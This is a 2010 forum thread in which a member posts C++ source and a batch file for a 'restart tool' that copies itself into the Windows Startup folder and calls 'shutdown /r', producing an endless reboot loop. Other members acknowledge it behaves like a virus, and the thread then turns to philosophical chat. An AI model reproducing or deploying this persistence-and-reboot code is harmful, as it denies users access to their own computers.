My Simple tool to Restart Windows XP

General Discussions
Post Reply
User avatar
Nipuna
Moderator
Moderator
Posts: 2729
Joined: Mon Jan 04, 2010 8:02 pm
Location: Deraniyagala,SRI LANKA

My Simple tool to Restart Windows XP

Post by Nipuna » Mon Oct 18, 2010 11:35 am

Hey Friends I made a Little Program.

And This is For Windows XP Only

I've attached the Source and the Program.
[url=https://robot.lk/download/file.php?id=1983]XP Restarter.zip[/url]
[url=https://robot.lk/download/file.php?id=1982]XP Restarter Source.zip[/url]
First Extract these .Zip files into one Folder. Otherwise It won't work
When you Running the Program Make Sure you have Installed two Operating Systems. ;) :D

Here are the Source Codes

Restart

Code: Select all

#include<iostream>
using namespace std;
int main ()
{
    cout <<"You can't Stop Nipuna"<<endl;
    cout <<"Be Careful With Him"<<endl;
    cout <<"Bye Bye Folks"<<endl;
    cout <<"Ha Ha Ha";
    system("shutdown /r");
    cin.get ();
    return 0;
}
Bat Runner

Code: Select all

#include<iostream>
using namespace std;
int main ()
{
    system ("run.bat");
    return 0;
}
Source Code Of Run.bat File

Code: Select all

echo off
copy restart.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
restart.exe
Last edited by Nipuna on Thu Oct 21, 2010 11:31 am, edited 1 time in total.
User avatar
Neo
Site Admin
Site Admin
Posts: 2642
Joined: Wed Jul 15, 2009 2:07 am
Location: Colombo

Re: My Simple too to Restart Windows XP

Post by Neo » Mon Oct 18, 2010 12:04 pm

Hey, this will keep on restarting your PC jut like a virus, isn't it? :)
User avatar
Nipuna
Moderator
Moderator
Posts: 2729
Joined: Mon Jan 04, 2010 8:02 pm
Location: Deraniyagala,SRI LANKA

Re: My Simple too to Restart Windows XP

Post by Nipuna » Mon Oct 18, 2010 12:09 pm

Neo wrote:Hey, this will keep on restarting your PC jut like a virus, isn't it? :)
Yes it is. :D

That's why I wrote "Make Sure you Have Installed two OSes" :D

I think you Know How to remove this. Aren't you? :)

Because You are an Expert on this Subject and I am Only a Beginner :)

Thanks
User avatar
Neo
Site Admin
Site Admin
Posts: 2642
Joined: Wed Jul 15, 2009 2:07 am
Location: Colombo

Re: My Simple too to Restart Windows XP

Post by Neo » Mon Oct 18, 2010 1:21 pm

I believe one thing in life.
Ordinary humans are not experts in anything (including me, you, everybody). We never invented anything in life. We just gained knowledge that someone else has invented. We just use the knowledge. So how can I be an expert :lol:
I believe Lord Buddha is an expert. Ven Sariputta, Moggallana like Arihats are experts. In the world of science, Prof. Albert Einstein is an expert.

Most people who show that they are experts are the most dumbest people I have met and they only know how to mix technical terms with English in front of children. Most intelligent people usually not talk about technical stuff. They silently go through the endless learning process.

Anyway I try to share my knowledge & expereince as much as possible for the benefit of needy people and I encourage others to do the same in this short period of life.

Also, Expert Core is a CPU (Core) that can think of real world using artificial intelligence and adjust the knowledge algorithms using neural networks. This CPU is yet to be invented. However, it is not about humans :lol:
User avatar
Nipuna
Moderator
Moderator
Posts: 2729
Joined: Mon Jan 04, 2010 8:02 pm
Location: Deraniyagala,SRI LANKA

Re: My Simple too to Restart Windows XP

Post by Nipuna » Mon Oct 18, 2010 2:55 pm

Oh What a Talk

Sorry for my Mistakes.

And Thanks for the Great Ideas :)
Post Reply

Return to “General Discussions”